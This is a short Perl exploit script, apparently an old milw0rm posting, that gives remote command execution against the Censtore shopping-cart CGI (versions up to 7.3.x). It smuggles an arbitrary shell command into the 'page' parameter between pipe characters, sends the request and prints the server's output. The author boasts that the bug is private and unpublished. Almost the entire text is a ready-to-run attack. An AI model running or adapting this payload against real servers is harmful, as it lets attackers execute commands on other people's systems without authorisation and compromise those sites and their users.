Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit
:
#!/usr/bin/perl
#
# Censtore.cgi exploit by FOX_MULDER (fox_mulder@abv.bg)
#
# Vulnerability foud by FOX_MULDER.
#
# This is the first exploit i release and the bug is not public so enjoy.
# Ask http://censtore.com/ what they think about it !!!
#
###########################
use IO::Socket;
use LWP::Simple;
sub Usage {
print STDERR "
FOX_MULDER DID IT AGAIN !!!
";
print STDERR "Usage:
cenex.pl <www.example.com> </path/> "cmd"
";
exit;
}
if (@ARGV < 3)
{
Usage();
}
$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "
!!! ULTRA PRIVATE EDITION !!!
";
print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER
";
print "
[+] Conecting to $host
";
my $result = get("http://$host$path/censtore.cgi?page=|$command|");
if (defined $result) {
print $result;
}
else {
print "Error with request.
";
}
# milw0rm.com [2006-04-13]